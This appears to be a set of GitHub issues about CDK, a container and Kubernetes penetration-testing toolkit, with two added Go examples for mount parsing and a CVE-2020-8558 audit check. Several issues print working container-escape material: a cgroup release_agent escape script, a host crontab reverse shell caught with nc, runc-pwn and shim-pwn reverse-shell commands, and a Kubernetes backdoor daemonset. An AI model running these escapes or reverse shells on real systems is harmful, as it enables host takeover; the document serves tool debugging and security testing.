2023/03/12 02:15:28 Exploit CVE-2019-5736 with shellcode commands:  echo 'hello,host' > /tmp/haha.escape
[0xc0001ccb60 0xc0001ccc30 0xc0001c81a0 0xc0001c9ba0 0xc00008dc70 0xc0001c8f70 0xc0001c9040 0xc0001c9790 0xc0001c9110 0xc0001c8a90 0xc0001c91e0 0xc0001c9c70 0xc00008dd40 0xc0001c8b60 0xc0001cc340 0xc00008dad0 0xc0001cc410 0xc00008dba0 0xc0001c9ee0 0xc0001c8750 0xc0001c92b0 0xc00008de10 0xc0001c9860 0xc0001c8820 0xc0001c9d40 0xc0001c8270 0xc0001c8340 0xc0001cc4e0 0xc0001cc000 0xc0001cc0d0 0xc0001c9380 0xc0001c88f0 0xc0001c8c30 0xc0001c9450 0xc0001c8410 0xc0001c9520 0xc0001c8d00 0xc0001c84e0 0xc00008dee0 0xc0001cc750 0xc0001cc1a0 0xc0001cc5b0 0xc0001c9e10 0xc0001c85b0 0xc0001cc9c0 0xc0001c9930 0xc0001c9a00 0xc0001c8680 0xc0001c89c0 0xc0001c8000 0xc0001cc820 0xc0001c95f0 0xc0001cca90 0xc0001cc270 0xc0001c80d0 0xc0001c8dd0 0xc0001c96c0 0xc0001cc8f0 0xc0001cc680 0xc0001c8ea0 0xc0001c9ad0]
/bin/bash
./cdkrunrunc-pwnecho 'hello,host' > /tmp/haha.escape
        cannot find RunC process inside container, exit.
2023/03/12 02:15:28 Finished.

Handling of the command concatenation problem when mount-cgroup executes a command

root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab"
2023/10/17 04:25:59 current cgroup for exploit: memory 
2023/10/17 04:25:59 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab 
2023/10/17 04:25:59 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:25:59 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_St8G

2023/10/17 04:25:59 shell script saved to /cdk_cgexp_St8G.sh
2023/10/17 04:26:04 Execute Result: 

 * * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
 
root@79a270635491:/#
root@79a270635491:/# 
root@79a270635491:/# 
root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab; echo hello"
2023/10/17 04:28:43 current cgroup for exploit: memory 
2023/10/17 04:28:43 user-defined shell payload is: echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello 
2023/10/17 04:28:43 Found hostpath: /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff
2023/10/17 04:28:43 generate shell exploit with user-input cmd: 

echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello

final shell exploit is: 

#!/bin/sh
echo "* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'" >> /etc/crontab; echo hello > /var/lib/docker/overlay2/37263eea1b159b6a86395fe44a9ede856a2f8c055f309244d2d16d7619f2541d/diff/cdk_cgres_ieFr

2023/10/17 04:28:43 shell script saved to /cdk_cgexp_ieFr.sh
2023/10/17 04:28:48 Execute Result: 

 hello
 
root@79a270635491:/#
ubuntu@VM-0-2-ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
# You can also override PATH, but by default, newer versions inherit it from the environment
#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'
ubuntu@VM-0-2-ubuntu:~$ 
ubuntu@VM-0-2-ubuntu:~$ nc -lvnp 22334
Listening on 0.0.0.0 22334
Connection received on 127.0.0.1 43058
bash: cannot set terminal process group (29740): Inappropriate ioctl for device
bash: no job control in this shell
root@VM-0-2-ubuntu:~#

Mount-procfs exploit does not work on containerd due to dots in the path

Please describe the issue in detail

Attempting to run the mount-procfs exploit on a k8s cluster using containerd runtime does not work due to the overlayfs mount directories having dots in the paths.

Under Docker the mount paths looks like: workdir=/var/lib/docker/overlay2/d3aa09836e4b0c0f3db172f04f3b9b4a1a247b69de3662f4a5b387615a3373b4/work

Under Containerd they look like: workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/4301/work

The regex in https://github.com/cdk-team/CDK/blob/main/pkg/exploit/mount_procfs.go#L44 does not match the containerd path due to the dots in the path (it only matches alphanumeric or digit characters). Adding "\." to the allowed characters lets the regex match the containerd path; however, there may be other valid path characters that also need to be accounted for.

Additional Information

$ ./cdk run mount-procfs /mnt/host_proc hostname
2023/02/21 20:26:30 failed to find docker abs path in /proc/self/mounts
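The issue above traces the failure to a character-class regex that cannot match containerd's dotted snapshot paths. The following is an added example (not CDK's own code) of parsing the overlay options of a /proc/self/mounts line as comma-separated key=value pairs instead, so Docker's hex-named directories and containerd's io.containerd.snapshotter.v1.overlayfs/snapshots/<id> layout both parse. The two sample mount lines are constructed from the paths quoted in the issue, and the function names are mine. For an incident responder the same parser answers a defensive question: which on-host snapshot directory backs a given container's root filesystem.

```go
package main

import (
	"bufio"
	"fmt"
	"strings"
)

// OverlayDirs holds the host-side directories backing an overlay mount.
type OverlayDirs struct {
	Lower   []string
	Upper   string
	Work    string
	Runtime string // "docker", "containerd" or "unknown", inferred from the workdir path
}

// parseOverlayMount parses one /proc/self/mounts line. It returns ok=false for
// lines that are not overlay mounts. Options are split on ',' and then on the
// first '=', so every character a path may contain (including '.') is accepted,
// which a character-class regex such as [0-9a-z]+ does not do.
func parseOverlayMount(line string) (OverlayDirs, bool) {
	var d OverlayDirs
	fields := strings.Fields(line)
	if len(fields) < 4 || fields[2] != "overlay" {
		return d, false
	}
	for _, opt := range strings.Split(fields[3], ",") {
		key, val, found := strings.Cut(opt, "=")
		if !found {
			continue // flags such as rw or relatime carry no value
		}
		switch key {
		case "lowerdir":
			d.Lower = strings.Split(val, ":")
		case "upperdir":
			d.Upper = val
		case "workdir":
			d.Work = val
		}
	}
	if d.Work == "" && d.Upper == "" {
		return d, false
	}
	d.Runtime = inferRuntime(d.Work)
	return d, true
}

// inferRuntime guesses the container runtime from the workdir layout.
func inferRuntime(path string) string {
	switch {
	case strings.Contains(path, "/var/lib/docker/overlay2/"):
		return "docker"
	case strings.Contains(path, "io.containerd.snapshotter.v1.overlayfs/snapshots/"):
		return "containerd"
	default:
		return "unknown"
	}
}

// findRootOverlay scans mount-table text for the overlay mounted at "/".
func findRootOverlay(mounts string) (OverlayDirs, bool) {
	sc := bufio.NewScanner(strings.NewReader(mounts))
	for sc.Scan() {
		fields := strings.Fields(sc.Text())
		if len(fields) >= 2 && fields[1] == "/" {
			if d, ok := parseOverlayMount(sc.Text()); ok {
				return d, true
			}
		}
	}
	return OverlayDirs{}, false
}

// Constructed sample lines (not captured from a real host); the directory
// names are the ones quoted in the issue above.
const dockerLine = "overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB,upperdir=/var/lib/docker/overlay2/d3aa09836e4b0c0f3db172f04f3b9b4a1a247b69de3662f4a5b387615a3373b4/diff,workdir=/var/lib/docker/overlay2/d3aa09836e4b0c0f3db172f04f3b9b4a1a247b69de3662f4a5b387615a3373b4/work 0 0"
const containerdLine = "overlay / overlay rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/12/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/4301/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/4301/work 0 0"

func main() {
	for _, l := range []string{dockerLine, containerdLine} {
		if d, ok := parseOverlayMount(l); ok {
			fmt.Printf("%-10s upper=%s\n", d.Runtime, d.Upper)
		}
	}
}
```

On a live system read /proc/self/mounts and pass its contents to findRootOverlay; the runtime label is only a heuristic on the path layout, so treat "unknown" as "inspect by hand" rather than as a negative result.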

shim-pwn documentation omits a parameter

Using this exp to get a reverse shell requires the reverse argument, which the documentation does not mention
./cdk_linux_amd64 run shim-pwn reverse RHOST RPORT

Starting with Kubernetes v1.20, K8s removes metadata.selfLink by default

Historically, several places in our code have an interesting but not very elegant implementation: using selfLink to decide whether the Kubernetes ApiServer response is correct.

For example, CDK (github.com/cdk-team/CDK) checks for "selfLink": "/api/v1/namespaces/kube-system/pods/process-exporter-qnqwk";

But starting with Kubernetes v1.20, K8s removes the metadata.selfLink field by default; selfLink is only present if the apiserver is restarted with RemoveSelfLink=false added.

I am still thinking about whether there is a more elegant way to fix this; after all, it is impossible for a vulnerability testing tool to require the environment under test to change its startup parameters 😂.

[Exploit k8s-shadow-apiserver] Cannot find kube-apiserver pod in namespace:kube-system, maybe target K8s master node managed by cloud provider, cannot deploy api-server in this environment.

cdk k8s-shadow-apiserver module error

$ ./cdk run k8s-shadow-apiserver default
2023/02/15 08:41:33 getting K8s api-server API addr.
Find K8s api-server in ENV: https://10.96.0.1:443
2023/02/15 08:41:33 trying to find api-server pod in namespace:kube-system
Cannot find kube-apiserver pod in namespace:kube-system, maybe target K8s master node managed by cloud provider, cannot deploy api-server in this environment.

$ kubectl get pods -A
kube-flannel kube-flannel-ds-gkz6b 1/1 Running 0 12d
kube-flannel kube-flannel-ds-s6dnl 1/1 Running 1 (171m ago) 13d
kube-flannel kube-flannel-ds-s84n9 1/1 Running 0 12d
kube-system coredns-567c556887-2jqtm 1/1 Running 1 (171m ago) 13d
kube-system coredns-567c556887-kh49x 1/1 Running 1 (171m ago) 13d
kube-system etcd-ubuntu18 1/1 Running 1 (171m ago) 5h55m
kube-system kube-apiserver-ubuntu18 1/1 Running 7 (171m ago) 13d
kube-system kube-controller-manager-ubuntu18 1/1 Running 18 (171m ago) 13d
kube-system kube-proxy-jmzr2 1/1 Running 1 (171m ago) 13d
kube-system kube-proxy-m88gf 1/1 Running 0 12d
kube-system kube-proxy-r2ghj 1/1 Running 0 12d
kube-system kube-scheduler-ubuntu18 1/1 Running 18 (171m ago) 13d

wiki cannot be downloaded

Please describe the issue in detail

Using the command git clone https://github.com/cdk-team/CDK.wiki.git
the following error appears:
Cloning into 'CDK.wiki'...
fatal: unable to access 'https://github.com/cdk-team/CDK.wiki.git/': Recv failure: Connection was reset

Two problems with docker_runc.go in the exploit module

  1. After running ./cdk run runc-pwn "", matching runc among the processes matches the process running this very command, so the self process is always matched first. I suggest changing the command, e.g. to ./cdk run rc-pwn
    image

image

  2. After reading the pids under /proc, the code in the figure below iterates over the pids only once and then exits; it should keep watching until the host runs docker exec again, at which point runc can be found.
    image
    I suggest wrapping it in another for loop

A question about exploitation

Hi,
I understand that CDK can collect pod/cluster information with one click. But regarding the Exploit module, e.g. container escape, I am not sure how to determine whether the current container can be escaped. Do I need to test them one by one? Or will the information gathering module report the CVE numbers of the exploitable vulnerabilities?

Two problems with Exploit-docker_runc.go

  1. Line 48 of the code checks whether it is a directory; if !util.IsDir(f.Name()) should be changed to if !util.IsDir("/proc/" + f.Name())
    screenshot

  2. Line 93 of the code, Desc() is wrong
    screenshot (1)
    It should be ./cdk run runc-pwn <shell-cmd>; several other modules have the same problem.

k8s-backdoor-daemonset script fails

Please describe the issue in detail

Note: Before submitting an issue, please check whether the CDK you are using is the latest version, otherwise there may be some bugs that have already been fixed in the latest version.

Hi here, I failed to execute k8s-backdoor-daemonset script with the following output:

/ # ./cdk run k8s-backdoor-daemonset default ubuntu
2021/04/05 07:06:51 getting K8s api-server API addr.
        Find K8s api-server in ENV: https://10.233.0.1:443
2021/04/05 07:06:51 trying to deploy daemonset with image:kube-proxy to k8s-app:ubuntu
2021/04/05 07:06:51 api-server response:
{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"the server could not find the requested resource","reason":"NotFound","details":{},"code":404}

Here's my k8s version:

root@node1:/home/ubuntu# kubectl version --short
Client Version: v1.20.5
Server Version: v1.20.5

I noticed that my daemonsets resource is in apps/v1 API version, while CDK sends request to extensions/v1beta1:

root@node1:/home/ubuntu# kubectl api-resources | grep daemonsets
daemonsets                        ds           apps/v1                                true         DaemonSet

var k8sDaemonsetApi = "/apis/extensions/v1beta1/namespaces/kube-system/daemonsets"

And according to this Kubernetes Blog, from v1.16 on, DaemonSet in the extensions/v1beta1 and apps/v1beta2 API versions is no longer served. Migrate to use the apps/v1 API version, available since v1.9.

I guess that's why I failed to execute k8s-backdoor-daemonset script. My solution to this problem is checking version of the sever first (this could be done by sending request to /version, example is below), and then choosing the correct API version based on the server version.

/ # curl -k https://10.233.0.1:443/version
{
  "major": "1",
  "minor": "20",
  "gitVersion": "v1.20.5",
  "gitCommit": "6b1d87acf3c8253c123756b9e61dac642678305f",
  "gitTreeState": "clean",
  "buildDate": "2021-03-18T01:02:01Z",
  "goVersion": "go1.15.8",
  "compiler": "gc",
  "platform": "linux/amd64"
}

By the way, CDK is a fantastic toolkit, thank you!

Additional Information

1. Full output of your execution of cdk evaluate --full

$ ./cdk evaluate --full
[Information Gathering - System Info]
2021/04/05 07:13:16 current dir: /
2021/04/05 07:13:16 current user: root uid: 0 gid: 0 home: /root
2021/04/05 07:13:16 alpine alpine 3.13.4 kernel: 5.4.0-70-generic

[Information Gathering - Services]
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_SERVICE_PORT=443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT=tcp://10.233.0.1:443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP_ADDR=10.233.0.1
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP_PORT=443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP_PROTO=tcp
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_PORT_443_TCP=tcp://10.233.0.1:443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_SERVICE_PORT_HTTPS=443
2021/04/05 07:13:16 sensitive env found:
        KUBERNETES_SERVICE_HOST=10.233.0.1

[Information Gathering - Commands and Capabilities]
2021/04/05 07:13:16 available commands:
        curl,wget,nc,find,ps,vi,mount,fdisk
2021/04/05 07:13:16 Capabilities:
        CapEff: 00000000a80425fb


[Information Gathering - Mounts]

[Information Gathering - Net Namespace]
        container net namespace isolated.

[Information Gathering - Sysctl Variables]
2021/04/05 07:13:16 net.ipv4.conf.all.route_localnet = 1

2021/04/05 07:13:16 You may be able to access the localhost service of the current container node or other nodes.
2021/04/05 07:13:16 CVE-2020-8558: The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue
which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Node setting allows for neighboring hosts to bypass localhost boundary.

[Discovery - K8s API Server]
2021/04/05 07:13:16 checking if api-server allows system:anonymous request.
        api-server forbids anonymous request.
        response:{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"forbidden: User \"system:anonymous\" cannot get path \"/\"","reason":"Forbidden","details":{},"code":403}


[Discovery - K8s Service Account]
        service-account is available
2021/04/05 07:13:16 trying to list namespaces
        success, the service-account have a high authority.
        now you can make your own request to takeover the entire k8s cluster with `./cdk kcurl` command
        good luck and have fun.

[Discovery - Cloud Provider Metadata API]
2021/04/05 07:13:17 failed to dial Alibaba Cloud API.
2021/04/05 07:13:18 failed to dial Azure API.
2021/04/05 07:13:18 failed to dial Google Cloud API.
2021/04/05 07:13:18 failed to dial Tencent Cloud API.

[Information Gathering - Sensitive Files]
        .dockerenv - /.dockerenv
        /serviceaccount - /run/secrets/kubernetes.io/serviceaccount

2. Please post the full error message, which can be command line output, software error message, screenshots, etc.

Attention, please post the full error message, don't paste only the last line of the error!

Here's the screenshot of the error message:
image

Suggestion: add checks for the other conditions required for exploitation to the net.ipv4.conf.all.route_localnet check

Hi @neargle, while reproducing CVE-2020-8558 locally I found that, to access a localhost TCP service on the host from a pod, besides route_localnet being 1 on both the pod and the host, one of the following two conditions is also required so that the reply packet the pod receives from the host passes the source address check:

  1. The pod has CAP_NET_ADMIN, in order to modify the routing entry for 127.0.0.1 inside the pod

  2. /proc/sys/net/ipv4/conf/{all && interfaces}/rp_filter are all 0 (interfaces excluding lo), and /proc/sys/net/ipv4/conf/{all || interface}/accept_local is 1

The net.ipv4.conf.all.route_localnet check in the Evaluate feature could add checks for the two conditions above, to further determine whether exploitation is possible.

If needed I can submit a PR later

The issue referenced for condition 1
Explanation of rp_filter and accept_local
Someone else's reproduction write-up
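The issue above spells out the preconditions under which route_localnet=1 actually lets a pod reach services bound to 127.0.0.1 on the node. The following is an added example (not CDK's own code, and not a PR from the issue author) of an audit check that evaluates exactly those conditions so an operator can tell which nodes need net.ipv4.conf.all.route_localnet reset to 0 or a stricter rp_filter. Sysctl values are passed in as a map so the logic can be tested without a real /proc; readSysctls fills that map on a live Linux host. The CapEff value used in main is the one printed by cdk evaluate in the issue further up this page (the default Docker capability set, which lacks CAP_NET_ADMIN); everything else is constructed.

```go
package main

import (
	"fmt"
	"os"
	"strings"
)

// capNetAdmin is the bit index of CAP_NET_ADMIN in the kernel capability
// bitmask (linux/capability.h).
const capNetAdmin = 12

// Sysctls maps a key relative to /proc/sys/net/ipv4/ to its value,
// e.g. "conf/all/rp_filter" -> "0".
type Sysctls map[string]string

// Finding summarizes the CVE-2020-8558 preconditions from the issue above.
type Finding struct {
	RouteLocalnet  bool // net.ipv4.conf.all.route_localnet = 1
	HasNetAdmin    bool // condition 1: CAP_NET_ADMIN present in CapEff
	WeakRPFilter   bool // condition 2: rp_filter 0 on all + every non-lo interface, accept_local 1 somewhere
	LikelyAffected bool // RouteLocalnet && (HasNetAdmin || WeakRPFilter)
}

func hasCap(capEff uint64, bit uint) bool { return capEff&(1<<bit) != 0 }

// checkRouteLocalnet evaluates the preconditions. ifaces lists the interface
// names under /proc/sys/net/ipv4/conf, excluding "all" and "default".
func checkRouteLocalnet(s Sysctls, ifaces []string, capEff uint64) Finding {
	f := Finding{
		RouteLocalnet: s["conf/all/route_localnet"] == "1",
		HasNetAdmin:   hasCap(capEff, capNetAdmin),
	}
	rpOff := s["conf/all/rp_filter"] == "0"
	acceptLocal := s["conf/all/accept_local"] == "1"
	for _, ifc := range ifaces {
		if ifc == "lo" {
			continue // the issue excludes lo from the rp_filter condition
		}
		if s["conf/"+ifc+"/rp_filter"] != "0" {
			rpOff = false
		}
		if s["conf/"+ifc+"/accept_local"] == "1" {
			acceptLocal = true
		}
	}
	f.WeakRPFilter = rpOff && acceptLocal
	f.LikelyAffected = f.RouteLocalnet && (f.HasNetAdmin || f.WeakRPFilter)
	return f
}

// readSysctls reads the keys the check needs from the live /proc (Linux only);
// keys that cannot be read are simply absent and therefore evaluate as "not set".
func readSysctls(ifaces []string) Sysctls {
	s := Sysctls{}
	keys := []string{"conf/all/route_localnet", "conf/all/rp_filter", "conf/all/accept_local"}
	for _, ifc := range ifaces {
		keys = append(keys, "conf/"+ifc+"/rp_filter", "conf/"+ifc+"/accept_local")
	}
	for _, k := range keys {
		if b, err := os.ReadFile("/proc/sys/net/ipv4/" + k); err == nil {
			s[k] = strings.TrimSpace(string(b))
		}
	}
	return s
}

func main() {
	// Constructed sample: route_localnet on, rp_filter relaxed, accept_local on.
	sample := Sysctls{
		"conf/all/route_localnet": "1",
		"conf/all/rp_filter":      "0",
		"conf/eth0/rp_filter":     "0",
		"conf/all/accept_local":   "1",
	}
	// 0xa80425fb is the CapEff from the evaluate output in this thread.
	f := checkRouteLocalnet(sample, []string{"lo", "eth0"}, 0x00000000a80425fb)
	fmt.Printf("%+v\n", f)
}
```

The check is deliberately conservative in one direction only: a node with route_localnet=1 but neither extra condition is reported as not affected, which matches the issue's analysis but still leaves route_localnet=1 as a setting worth removing.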

A question about the shadow apiserver module in cdk

Before v1.1.1 there was still --insecure-port=9443; since k8s deprecated it, cdk also commented it out. Now, relying only on these two parameters
--anonymous-auth=true
--authorization-mode=AlwaysAllow
there is no way to get anonymous access to the secure port. Does this exploitation still have to rely on the anonymous user having high privileges?

Thanks!

mount-cgroup cannot execute commands more than once

Please describe the issue in detail

mount-cgroup cannot execute commands more than once

root@0a8d085e98bf:/cdk# ./cdk_linux_amd64 run mount-cgroup "whoami"
2022/01/25 02:17:56 user-defined shell payload is whoami
2022/01/25 02:17:56 generate shell exploit with user-input cmd:

whoami

#!/bin/sh
mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq
echo 1 > /tmp/cgrp/cdk_oeq/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd_oeq" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd_oeq
echo "whoami > $host_path/output_oeq" >> /cmd_oeq
chmod a+x /cmd_oeq
sh -c "echo \$\$ > /tmp/cgrp/cdk_oeq/cgroup.procs"
sleep 3
cat /output_oeq

2022/01/25 02:17:56 shell script saved to exploit_oeq.sh
2022/01/25 02:17:59 Execute Shell:./exploit_oeq.sh . failed:
exit status 1

附加信息(Additional Information)

1. Analysis shows that in the generated payload script

mkdir -p /tmp/cgrp; mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir -p /tmp/cgrp/cdk_oeq

because the mount was already performed the first time, the command fails, which in turn prevents the mkdir -p /tmp/cgrp/cdk_oeq command from running

The && command connector needs to be changed to solve this problem

shim-pwn execution fails

I tried shim-pwn; running the shim-pwn exp inside the container reported the following error:

debianxxx(@:):~# ./cdk_linux_amd64 run shim-pwn 10.1.1.1 12346
2020/12/30 17:36:09 tring to spawn shell to 10.1.1.1:12346
2020/12/30 17:36:09 try socket: @/containerd-shim/moby/fc3385bd1b56983d7a5fc2997560cc445180cd1130150692171563eed09d8c3d/shim.sock
2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
2020/12/30 17:36:09 try socket: @/containerd-shim/moby/b029461e5e5f7dbca3b6fd89414ac06946d5fb73456000edcc2f9fcc6ef9164c/shim.sock
2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found
2020/12/30 17:36:09 try socket: @/containerd-shim/moby/7a77f96e2061f6d5160167400ae59b20d08229a626ff1ef5bdd9e7458e95741f/shim.sock
2020/12/30 17:36:09 rpc error: rpc error: code = Unknown desc = OCI runtime create failed: JSON specification file config.json not found

docker version:

Client:
 Version:           18.06.1-ce
 API version:       1.38
 Go version:        go1.10.3
 Git commit:        e68fc7a
 Built:             Tue Aug 21 17:23:18 2018
 OS/Arch:           linux/amd64
 Experimental:      false

Server:
 Engine:
  Version:          18.06.1-ce
  API version:      1.38 (minimum version 1.12)
  Go version:       go1.10.3
  Git commit:       e68fc7a
  Built:            Tue Aug 21 17:22:21 2018
  OS/Arch:          linux/amd64
  Experimental:     false

Problem reproducing CVE-2020-14257

Problem encountered while reproducing CVE-2020-15257

I want to reproduce CDK exploiting CVE-2020-15257; my docker version is

$docker version
Client:
 Version:      18.03.1-ce
 API version:  1.37
 Go version:   go1.9.5
 Git commit:   9ee9f40
 Built:        Thu Apr 26 07:17:20 2018
 OS/Arch:      linux/amd64
 Experimental: false
 Orchestrator: swarm

Server:
 Engine:
  Version:      18.03.1-ce
  API version:  1.37 (minimum version 1.12)
  Go version:   go1.9.5
  Git commit:   9ee9f40
  Built:        Thu Apr 26 07:15:30 2018
  OS/Arch:      linux/amd64
  Experimental: false

The API version is 1.3.7, which is a vulnerable version.

Run the following commands:

docker run -itd --name 14257 --net=host ubuntu /bin/bash
docker cp cdk_linux_amd64 15257:/tmp

Then inside the container:

./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234

Now I want to get a reverse shell of the host machine to my attack machine, but the program reports an error; the details are as follows:

root@ubuntu:/tmp# ./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx 1234
2021/06/25 03:01:57 tring to spawn shell to xx.xx.xx.xx:1234
2021/06/25 03:01:57 try socket: @/containerd-shim/moby/984f085a7c09eac06c5f0dd7318168b50c3438351544de4f6f9a7c1e0f1ef997/shim.sock
2021/06/25 03:01:57 rpc error response.:
rpc error: code = Unknown desc = OCI runtime create failed: exec: "runc": executable file not found in $PATH
2021/06/25 03:01:57 exploit failed.

It looks like runc was not found in the $PATH directories. I installed docker using the method provided on the official website, never installed runc separately, and never switched the underlying container runtime. The container runs normally, which shows runc must be on the system, but the exploitation failed.

Additional Information

1. What is the output of cdk evaluate --full? [executed on the host]

$ ./cdk_linux_amd64 evaluate --full

[Information Gathering - System Info]
2021/06/24 19:45:23 current dir: /home/xsw/Desktop
2021/06/24 19:45:23 current user: xsw uid: 1000 gid: 1000 home: /home/xsw
2021/06/24 19:45:23 hostname: ubuntu
2021/06/24 19:45:23 debian ubuntu 16.04 kernel: 4.8.0-34-generic

[Information Gathering - Services]
2021/06/24 19:45:23 sensitive env found:
	SSH_AUTH_SOCK=/run/user/1000/keyring/ssh
2021/06/24 19:45:23 service found in process:
	1873	1814	ibus-engine-sim
2021/06/24 19:45:23 service found in process:
	8638	1	dockerd
2021/06/24 19:45:23 service found in process:
	8644	8638	docker-containe
2021/06/24 19:45:23 service found in process:
	9976	8644	docker-containe
2021/06/24 19:45:23 service found in process:
	10501	10470	docker
2021/06/24 19:45:23 service found in process:
	12100	11244	docker
2021/06/24 19:45:23 service found in process:
	12106	8644	docker-containe

[Information Gathering - Commands and Capabilities]
2021/06/24 19:45:23 available commands:
	curl,wget,nc,netcat,docker,find,ps,python,python3,apt,dpkg,ssh,git,vi,capsh,mount,fdisk,gcc,g++,make,base64,python2,python2.7,perl,xterm,sudo
2021/06/24 19:45:23 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	0000000000000000
	CapEff:	0000000000000000
	CapBnd:	0000003fffffffff
	CapAmb:	0000000000000000
	Cap decode: 0x0000000000000000 = 
[*] Maybe you can exploit the Capabilities below:

[Information Gathering - Mounts]
Device:/dev/sda1 Path:/ Filesystem:ext4 Flags:rw,relatime,errors=remount-ro,data=ordered

[Information Gathering - Net Namespace]
	host unix-socket found, seems container started with --net=host privilege.
	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/7ec0aae020d2b66617d2fc95419ec3928d9c91b111ae639bdddfb24b99bfb98a/shim.sock]
	found containerd-shim socket in: [@/containerd-shim/moby/9be550f23f1466f727e2d01af195056be9505b831b0d644540db64a8082c58cc/shim.sock]

[Information Gathering - Sysctl Variables]
2021/06/24 19:45:23 net.ipv4.conf.all.route_localnet = 0

[Discovery - K8s API Server]
2021/06/24 19:45:23 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:

[Discovery - K8s Service Account]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory

[Discovery - Cloud Provider Metadata API]
2021/06/24 19:45:24 failed to dial Alibaba Cloud API.
2021/06/24 19:45:25 failed to dial Azure API.
